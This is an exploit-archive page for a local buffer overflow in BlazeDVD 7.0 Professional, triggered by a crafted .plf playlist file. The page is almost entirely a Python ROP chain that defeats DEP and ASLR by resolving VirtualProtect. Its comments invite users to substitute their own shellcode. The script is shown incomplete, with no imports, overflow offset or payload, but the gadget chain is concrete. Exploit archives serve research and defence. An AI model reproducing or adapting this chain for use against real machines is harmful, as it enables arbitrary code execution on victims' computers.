Blazedvd 7.0 professional .plf local buffer overflow (seh,aslr,dep) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2020-08-31 |
Type : local |
Platform : windows
This exploit / vulnerability Blazedvd 7.0 professional .plf local buffer overflow (seh,aslr,dep) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
## Title: BlazeDVD 7.0 Professional - '.plf' Local Buffer Overflow (SEH,ASLR,DEP)
## Author: emalp
## Date: 2020-08-31
## Vendor Homepage: http://www.blazevideo.com/
## Software Link: http://www.blazevideo.com/download/BlazeDVDProSetup.exe
## Version: 7.0.0.0
## Tested on: Windows 7 Home Basic
# Run this file
# bfile.plf will be generated
# In blazeDVD open playlist and select bfile.plf
# a pop up box will appear with text 'emalp'
## Change shellcode according to your needs
## Shellcode max size is aroung 700 bytes.
#---------------------------------------------------------------------
# this way we have a lot more space for shellcode.
buf += 'AAAA'
# esp lands here.
#setting up the dynamic pointer for virtual protect
buf += struct.pack('<L', 0x61640e32) # pop eax; retn.
buf += struct.pack('<L', 0xffed06a4) # opp of 0012f95c; contains pointer to k32
buf += struct.pack('<L', 0x603267d4) # neg eax, now eax contains 0012f95c
buf += struct.pack('<L', 0x616306ed) # mov eax, dword ptr ds:[eax]
# now eax has the kernel32.dll pointer
buf += struct.pack('<L', 0x61640f09) # push eax, pop esi, ret 04
buf += struct.pack('<L', 0x61640e32) # pop eax ret
buf += 'XXXX' # ret 4 padding
buf += struct.pack('<L', 0xffff675d) # neg to 98a3
buf += struct.pack('<L', 0x603267d4) # neg eax; ret
# right now eax = 98a3; esi = [0012f95c] = k32.dll val
buf += struct.pack('<L', 0x6033dcc4) # xchg eax,ecx; xor al,60; ret
buf += struct.pack('<L', 0x61644904) # mov eax,esi; pop esi; ret
buf += 'XXXX' # pop esi padding
buf += struct.pack('<L', 0x641045f4) # sub eax,ecx
# now eax has the pointer to VirtualProtect
#------------------------------------------------------------------------
# SETTING THE REGISTERS FOR VIRTUALPROTECT PARAM
# SETTING ESI
buf += struct.pack('<L', 0x61640f09) # push eax, pop esi; ret 4
# SETTING EBP
buf += struct.pack('<L', 0x60327f8f) # pop ebp; ret
buf += 'XXXX' # prev ret 4 padding
buf += struct.pack('<L', 0x60349b63) # jmp esp
# SETTING EBX
buf += struct.pack('<L', 0x61629938) # pop eax; ret
buf += struct.pack('<L', 0xfffffdff) # neg to 0x201
buf += struct.pack('<L', 0x6033b16b) # neg eax; ret
buf += struct.pack('<L', 0x61640124) # xchg eax,ebx
# SETTING EDX
buf += struct.pack('<L', 0x616310e8) # pop eax; ret
buf += struct.pack('<L', 0xffffffc0) # neg of 0x40
buf += struct.pack('<L', 0x6033b16b) # neg eax; retn
buf += struct.pack('<L', 0x61608ba2) # xchg eax,edx
# SETTING ECX
buf += struct.pack('<L', 0x6404fbb9) # pop ecx; ret
buf += struct.pack('<L', 0x1001524e) # writable location
# SETTING EDI
buf += struct.pack('<L', 0x6032b0b8) # pop edi; ret
buf += struct.pack('<L', 0x6162e802) # retn (rop nop)
# SETTING EAX
buf += struct.pack('<L', 0x6162d638) # pop eax; retn
buf += struct.pack('<L', 0x90909090) # nop
# FINALLY PUSHAD
buf += struct.pack('<L', 0x6033cd4a) # push ad